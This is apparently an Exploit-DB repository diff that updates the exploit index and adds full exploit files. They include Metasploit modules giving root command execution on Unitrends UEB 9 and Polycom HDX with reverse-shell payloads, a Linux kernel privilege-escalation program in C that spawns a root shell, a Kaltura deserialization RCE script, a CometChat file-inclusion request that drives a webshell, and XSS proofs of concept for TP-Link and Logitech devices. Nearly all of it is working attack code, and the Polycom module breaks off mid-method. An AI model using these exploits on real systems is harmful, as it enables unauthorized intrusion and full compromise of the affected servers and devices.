 43008,platforms/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,java,remote,0
+43025,platforms/windows/remote/43025.py,"Ayukov NFTP FTP Client < 2.0 - Buffer Overflow",2017-10-21,"Berk Cem Göksel",windows,remote,0
+43030,platforms/lin_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,443
+43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743
+43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -22417,7 +22423,7 @@ id,file,description,date,author,platform,type,port
 9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
 9890,platforms/php/webapps/9890.txt,"Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",php,webapps,0
 9891,platforms/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0
-9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
+9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
@ -30807,7 +30813,7 @@ id,file,description,date,author,platform,type,port
 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0
 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0
 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0
-28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0
+28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0
 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0
 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0
 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0
@ -32055,7 +32061,7 @@ id,file,description,date,author,platform,type,port
 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0
 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0
 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0
-30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
+30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0
 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0
 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0
@ -38712,7 +38718,11 @@ id,file,description,date,author,platform,type,port
 43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0
 43012,platforms/php/webapps/43012.txt,"Wordpress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps,0
 43015,platforms/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps,0
+43023,platforms/hardware/webapps/43023.txt,"TP-Link TL-MR3220 - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0
 43018,platforms/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",windows,webapps,0
 43019,platforms/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",windows,webapps,0
 43021,platforms/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",python,webapps,0
 43022,platforms/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code Exploit",2017-10-17,"Fidus InfoSecurity",hardware,webapps,0
+43024,platforms/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps,0
+43027,platforms/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps,0
+43028,platforms/php/webapps/43028.py,"Kaltura < 13.1.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps,0
--- a/platforms/hardware/webapps/43023.txt
+++ b/platforms/hardware/webapps/43023.txt
@ -0,0 +1,25 @@
+# Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220
+# Date: 12/10/2017
+# Exploit Author: Thiago "THX" Sena
+# Vendor Homepage: http://www.tp-link.com.br
+# Version: TL-MR3220
+# Tested on: Windows 10
+# CVE : CVE-2017-15291
+
+Vulnerabilty: Cross-site scripting (XSS) in TP-LINK TL-MR3220
+cve: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15291
+---------------------------------------------------------------
+
+PoC: 
+
+0x01 - First you go to ( http://IP:PORT/ )
+
+0x02 - In the 'Wireless MAC Filtering' tab. 
+
+0x03 - Will add a new MAC Address.
+
+0x04 - In 'Description' it will put the script ( <script>alert('XSS')</script> ) and complete the registration. 
+
+0x05 - Xss Vulnerability
+
+--------------------------------------------------------------
--- a/platforms/lin_x86/remote/43030.rb
+++ b/platforms/lin_x86/remote/43030.rb
@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Unitrends UEB 9 http api/storage remote root',
+      'Description'    => %q{
+        It was discovered that the api/storage web interface in Unitrends Backup (UB)
+        before 10.0.0 has an issue in which one of its input parameters was not validated.
+        A remote attacker could use this flaw to bypass authentication and execute arbitrary
+        commands with root privilege on the target system.
+      },
+      'Author'         =>
+        [
+          'Cale Smith',    # @0xC413
+          'Benny Husted', # @BennyHusted
+          'Jared Arave'   # @iotennui
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch' => [ARCH_X86],
+      'CmdStagerFlavor' => [ 'printf' ],
+      'References'     =>
+        [
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
+          ['CVE', '2017-12478'],
+        ],
+      'Targets'        =>
+        [
+          [ 'UEB 9.*', { } ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+          'SSL' => true
+        },
+      'DisclosureDate'  => 'Aug 8 2017',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true])
+      ])
+    deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  #substitue some charactes
+  def filter_bad_chars(cmd)
+    cmd.gsub!("\\", "\\\\\\")
+    cmd.gsub!("'", '\\"')
+  end
+
+  def execute_command(cmd, opts = {})
+    session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0"  #SQLi auth bypass
+    session = Base64.strict_encode64(session) #b64 encode session token
+
+    #substitue the cmd into the hostname parameter
+    parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
+    parms << filter_bad_chars(cmd)
+    parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
+
+
+    res = send_request_cgi({
+      'uri' => '/api/storage',
+      'method' => 'POST',
+      'ctype'  => 'application/json',
+      'encode_params' => false,
+      'data'   => parms,
+      'headers' =>
+        {'AuthToken' => session}
+    })
+
+    if res && res.code != 500
+      fail_with(Failure::UnexpectedReply,'Unexpected response')
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+  end
+
+  def exploit
+    print_status("#{peer} - pwn'ng ueb 9....")
+    execute_cmdstager(:linemax => 120)
+  end
+end
--- a/platforms/lin_x86/remote/43031.rb
+++ b/platforms/lin_x86/remote/43031.rb
@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Unitrends UEB bpserverd authentication bypass RCE',
+      'Description'    => %q{
+       It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
+       has an issue in which its authentication can be bypassed.  A remote attacker could use this
+       issue to execute arbitrary commands with root privilege on the target system.
+      },
+      'Author'         =>
+        [
+          'Jared Arave',  # @iotennui
+          'Cale Smith',   # @0xC413
+          'Benny Husted'  # @BennyHusted
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'linux',
+      'Arch' => [ARCH_X86],
+      'CmdStagerFlavor' => [ 'printf' ],
+      'References'     =>
+        [
+          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
+          ['CVE', '2017-12477'],
+        ],
+      'Targets'        =>
+        [
+          [ 'UEB 9.*', { } ]
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
+          'SSL' => false
+        },
+      'DisclosureDate'  => 'Aug 8 2017',
+      'DefaultTarget'   => 0))
+    register_options([
+        Opt::RPORT(1743)
+      ])
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    s1 = connect(global = false)
+    buf1  = s1.get_once(-1).to_s
+    #parse out the bpd port returned
+    bpd_port = buf1[-8..-3].to_i
+
+    #check if it's a valid port number (1-65534)
+    if bpd_port && bpd_port >= 1 && bpd_port <= 65535
+      Exploit::CheckCode::Detected
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+
+    #append a comment, ignore everything after our cmd
+    cmd = cmd + " #"
+
+    # build the attack buffer...
+    command_len = cmd.length + 3
+    packet_len = cmd.length + 23
+    data =  "\xa5\x52\x00\x2d"
+    data << "\x00\x00\x00"
+    data << packet_len
+    data << "\x00\x00\x00"
+    data << "\x01"
+    data << "\x00\x00\x00"
+    data << "\x4c"
+    data << "\x00\x00\x00"
+    data << command_len
+    data << cmd
+    data << "\x00\x00\x00"
+
+    begin
+      print_status("Connecting to xinetd for bpd port...")
+      s1 = connect(global = false)
+      buf1  = s1.get_once(-1).to_s
+
+      #parse out the bpd port returned, we will connect back on this port to send our cmd
+      bpd_port = buf1[-8..-3].to_i
+
+      print_good("bpd port recieved: #{bpd_port}")
+      vprint_status("Connecting to #{bpd_port}")
+
+      s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
+      vprint_good('Connected!')
+
+      print_status('Sending command buffer to xinetd')
+
+      s1.put(data)
+      s2.get_once(-1,1).to_s
+
+      disconnect(s1)
+      disconnect(s2)
+
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
+    end
+
+  end
+
+  def exploit
+    print_status("#{peer} - pwn'ng ueb 9....")
+    execute_cmdstager(:linemax => 200)
+  end
+end
--- a/platforms/linux/local/43029.c
+++ b/platforms/linux/local/43029.c
@ -0,0 +1,127 @@
+#define _GNU_SOURCE
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <string.h>
+
+struct cred;
+struct task_struct;
+ 
+typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
+typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
+ 
+prepare_kernel_cred_t   prepare_kernel_cred;
+commit_creds_t    commit_creds;
+ 
+void get_shell() {
+  char *argv[] = {"/bin/sh", NULL};
+ 
+  if (getuid() == 0){
+    printf("[+] Root shell success !! :)\n");
+    execve("/bin/sh", argv, NULL);
+  }
+  printf("[-] failed to get root shell :(\n");
+}
+ 
+void get_root() {
+  if (commit_creds && prepare_kernel_cred)
+    commit_creds(prepare_kernel_cred(0));
+}
+ 
+unsigned long get_kernel_sym(char *name)
+{
+  FILE *f;
+  unsigned long addr;
+  char dummy;
+  char sname[256];
+  int ret = 0;
+ 
+  f = fopen("/proc/kallsyms", "r");
+  if (f == NULL) {
+    printf("[-] Failed to open /proc/kallsyms\n");
+    exit(-1);
+  }
+  printf("[+] Find %s...\n", name);
+  while(ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      printf("[+] Found %s at %lx\n", name, addr);
+      return addr;
+    }
+  }
+  fclose(f);
+  return 0;
+}
+
+int main(int ac, char **av)
+{
+	if (ac != 2) {
+		printf("./exploit kernel_offset\n");
+		printf("exemple = 0xffffffff81f3f45a");
+		return EXIT_FAILURE;
+	}
+
+	// 2 - Appel de la fonction get_kernel_sym pour rcuperer dans le /proc/kallsyms les adresses des fonctions
+	prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
+	commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
+	// have_canfork_callback offset <= rendre dynamique aussi
+	
+	pid_t     pid;
+	/* siginfo_t info; */
+
+	// 1 - Mapper la mmoire  l'adresse 0x0000000000000000
+	printf("[+] Try to allocat 0x00000000...\n");
+	if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
+		printf("[-] Failed to allocat 0x00000000\n");
+		return -1;
+	}
+	printf("[+] Allocation success !\n");
+	/* memset(0, 0xcc, 4096); */
+/*
+movq rax, 0xffffffff81f3f45a
+movq [rax], 0
+mov rax, 0x4242424242424242
+call rax
+xor rax, rax
+ret
+replace 0x4242424242424242 by get_root
+https://defuse.ca/online-x86-assembler.htm#disassembly
+	 */
+	unsigned char shellcode[] = 
+	{ 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
+	void **get_root_offset = rawmemchr(shellcode, 0x42);
+	(*get_root_offset) = get_root;
+
+	memcpy(0, shellcode, sizeof(shellcode));
+	/* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */
+
+	if(-1 == (pid = fork())) {
+		perror("fork()");
+		return EXIT_FAILURE;
+	}
+
+	if(pid == 0) {
+		_exit(0xDEADBEEF);
+		perror("son");
+		return EXIT_FAILURE;
+	}
+
+	siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0);
+	waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED);
+
+// TRIGGER
+	pid = fork();
+	printf("fork_ret = %d\n", pid);	
+	if (pid > 0)
+		get_shell();
+	return EXIT_SUCCESS;
+}
--- a/platforms/multiple/webapps/43024.txt
+++ b/platforms/multiple/webapps/43024.txt
@ -0,0 +1,43 @@
+# Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server
+# Shodan Dork: Logitech Media Server 
+# Date: 14/10/2017
+# Exploit Author: Thiago "THX" Sena
+# Vendor Homepage: https://www.logitech.com
+# Tested on: windows 10
+# CVE : CVE-2017-15687
+
+-----------------------------------------------
+
+PoC:
+
+- First you go to ( http://IP:PORT/ )
+
+- Then put the script ( <BODY ONLOAD=alert(document.cookie)> )
+
+- ( http://IP:PORT/<BODY ONLOAD=alert(document.cookie)> )
+
+- Xss Vulnerability
+
+---------------------------------------------------
+
+[Versões Afetadas]
+
+7.7.3
+7.7.5
+7.9.1
+7.7.2
+7.7.1
+7.7.6
+7.9.0
+
+
+[Request]
+
+GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0
+Connection: close
+Upgrade-Insecure-Requests: 1
--- a/platforms/php/webapps/43027.txt
+++ b/platforms/php/webapps/43027.txt
@ -0,0 +1,60 @@
+# Exploit Title: CometChat < v6.2.0 BETA 1 - Local File Inclusion
+# Date: 2017-10-22
+# Exploit Author: Luke Paris (Paradoxis) <luke@paradoxis.nl>
+# Vendor Homepage: https://cometchat.com/
+# Version: < 6.2.0 BETA 1
+# Tested on: Ubuntu Linux 14.04
+#
+# --------------------------------------------------------------------------------------
+#
+# In versions of CometChat before version v6.2.0 BETA 1 a bug existed which allowed
+# any unauthorised attacker to modify the include path of a php file by sending an
+# HTTP request with a crafted 'cc_lang' cookie.
+#
+# If successfully exploited an attacker could leverage this bug to execute arbitrary PHP
+# code which resides somewhere else on the server (eg: uploaded via an upload form).
+#
+# Due to the fact that this bug resides in the configuration file of the applications
+# it might be possible that future versions of the chat application still contain the
+# file inclusion bug as the script might have been re-applied after an update.
+#
+# --------------------------------------------------------------------------------------
+#
+# The vulnerability resides in the application's configuration file, near the beginning 
+# of the script the following code block is executed, this is where an attacker is able 
+# to inject a string into the cc_lang cookie.
+
+/* COOKIE */
+$cookiePrefix = 'cc_';
+
+/* LANGUAGE START */
+$lang = 'en';
+
+/* LANGUAGE END */ 
+if (!empty($_COOKIE[$cookiePrefix."lang"])) {
+    $lang = $_COOKIE[$cookiePrefix."lang"];
+}
+
+# Near the end of the configuration file, the following code block is executed.
+# This is where the exploit is triggered by not sanitising the $lang variable properly.
+
+include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.'en.php';
+if (file_exists(dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php')) {
+    include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php';          
+}
+
+# The following example demonstrates how an attacker could leverage this bug to gain control 
+# over the server, which could result in a full server compromise (assuming the attacker has
+# already managed to write a webshell to the servers' disk somehow): 
+
+GET /cometchat/config.php?cmd=id HTTP/1.1
+Host: example.com
+Connection: keep-alive
+Cookie: cc_lang=../../uploads/evil
+
+HTTP/1.1 200 OK
+Host: example.com
+Connection: close
+Content-type: text/html; charset=UTF-8
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
--- a/platforms/php/webapps/43028.py
+++ b/platforms/php/webapps/43028.py
@ -0,0 +1,59 @@
+#!/usr/bin/env python
+
+# Kaltura <= 13.1.0 RCE (CVE-2017-14143)
+# https://telekomsecurity.github.io/2017/09/kaltura-rce.html
+# 
+# $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')"
+# [~] host: https://example.com
+# [~] entry_id: 0_xxxxxxxx
+# [~] code: system('id')
+# [+] sending request..
+# uid=1003(wwwrun) gid=50004(www) groups=50004(www),7373(kaltura)
+
+import urllib
+import urllib2
+import base64
+import md5
+import sys
+
+cookie_secret = 'y3tAno3therS$cr3T';
+
+def exploit(host, entry_id, php_code):
+    print("[+] Sending request..")
+    url = "{}/index.php/keditorservices/getAllEntries?list_type=15&entry_id={}".format(host, entry_id)
+
+    cmd = "{}.die();".format(php_code)
+    cmd_len = len(cmd)
+
+    payload = "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:%s:\"%s\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}"
+
+    exploit_code = payload % (len(cmd), cmd)
+    encoded = base64.b64encode(exploit_code)
+    md5_hash = md5.new("%s%s" % (encoded, cookie_secret)).hexdigest()
+
+    cookies={'userzone': "%s%s" % (encoded, md5_hash)}
+
+    r = urllib2.Request(url)
+    r.add_header('Cookie', urllib.urlencode(cookies))
+
+    req = urllib2.urlopen(r)
+    return req.read()
+
+if __name__ == '__main__':
+
+    if len(sys.argv) < 4:
+        print("Usage: %s <host> <entry_id> <php_code>" % sys.argv[0])
+        print(" example: %s http://example.com 0_abc1234 system('id')" % sys.argv[0])
+        sys.exit(0)
+
+    host = sys.argv[1]
+    entry_id = sys.argv[2]
+    cmd = sys.argv[3]
+
+    print("[~] host: %s" % host)
+    print("[~] entry_id: %s" % entry_id)
+    print("[~] php_code: %s" % cmd)
+
+    result = exploit(sys.argv[1], sys.argv[2], sys.argv[3])
+
+    print(result)
--- a/platforms/unix/remote/43032.rb
+++ b/platforms/unix/remote/43032.rb
@ -0,0 +1,246 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'            => 'Polycom Command Shell Authorization Bypass',
+        'Alias'           => 'polycom_hdx_auth_bypass',
+        'Author'          =>
+          [
+            'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
+            'h00die <mike@shorebreaksecurity.com>',         # submission/cleanup
+          ],
+        'DisclosureDate'  => 'Jan 18 2013',
+        'Description'     => %q(
+          The login component of the Polycom Command Shell on Polycom HDX
+          video endpoints, running software versions 3.0.5 and earlier,
+          is vulnerable to an authorization bypass when simultaneous
+          connections are made to the service, allowing remote network
+          attackers to gain access to a sandboxed telnet prompt without
+          authentication. Versions prior to 3.0.4 contain OS command
+          injection in the ping command which can be used to execute
+          arbitrary commands as root.
+          ),
+        'License'         => MSF_LICENSE,
+        'References'      =>
+          [
+            [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
+            [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
+            [ 'EDB', '24494']
+          ],
+        'Platform'    => 'unix',
+        'Arch'        => ARCH_CMD,
+        'Privileged'  => true,
+        'Targets'     => [ [ "Universal", {} ] ],
+        'Payload'     =>
+        {
+          'Space'        => 8000,
+          'DisableNops'  => true,
+          'Compat'       => { 'PayloadType' => 'cmd' }
+        },
+        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(23),
+        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
+        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
+      ], self.class
+    )
+    register_advanced_options(
+      [
+        OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
+        OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
+      ], self.class
+    )
+  end
+
+  def check
+    connect
+    sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
+    Rex.sleep(1)
+    res = sock.get_once
+    disconnect
+
+    if !res && !res.empty?
+      return Exploit::CheckCode::Safe
+    end
+
+    if res =~ /Welcome to ViewStation/
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # Keep track of results (successful connections)
+    results = []
+
+    # Random string for password
+    password = Rex::Text.rand_text_alpha(rand(5) + 1)
+
+    # Threaded login checker
+    max_threads = datastore['THREADS']
+    cur_threads = []
+
+    # Try up to 100 times just to be sure
+    queue = [*(1..datastore['MAX_CONNECTIONS'])]
+
+    print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
+    until queue.empty?
+      while cur_threads.length < max_threads
+
+        # We can stop if we get a valid login
+        break unless results.empty?
+
+        # keep track of how many attempts we've made
+        item = queue.shift
+
+        # We can stop if we reach max tries
+        break unless item
+
+        t = Thread.new(item) do |count|
+          sock = connect
+          sock.put(password + "\n")
+          res = sock.get_once
+
+          until res.empty?
+            break unless results.empty?
+
+            # Post-login Polycom banner means success
+            if res =~ /Polycom/
+              results << sock
+              break
+            # bind error indicates bypass is working
+            elsif res =~ /bind/
+              sock.put(password + "\n")
+            # Login error means we need to disconnect
+            elsif res =~ /failed/
+              break
+            # To many connections means we need to disconnect
+            elsif res =~ /Error/
+              break
+            end
+            res = sock.get_once
+          end
+        end
+
+        cur_threads << t
+      end
+
+      # We can stop if we get a valid login
+      break unless results.empty?
+
+      # Add to a list of dead threads if we're finished
+      cur_threads.each_index do |ti|
+        t = cur_threads[ti]
+        unless t.alive?
+          cur_threads[ti] = nil
+        end
+      end
+
+      # Remove any dead threads from the set
+      cur_threads.delete(nil)
+
+      Rex.sleep(0.25)
+    end
+
+    # Clean up any remaining threads
+    cur_threads.each { |sock| sock.kill }
+
+    if !results.empty?
+      print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
+      do_payload(results[0])
+    else
+      print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
+    end
+  end
+
+  def do_payload(sock)
+    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
+    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
+
+    # Start a listener
+    start_listener(true)
+
+    # Figure out the port we picked
+    cbport = self.service.getsockname[2]
+
+    # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
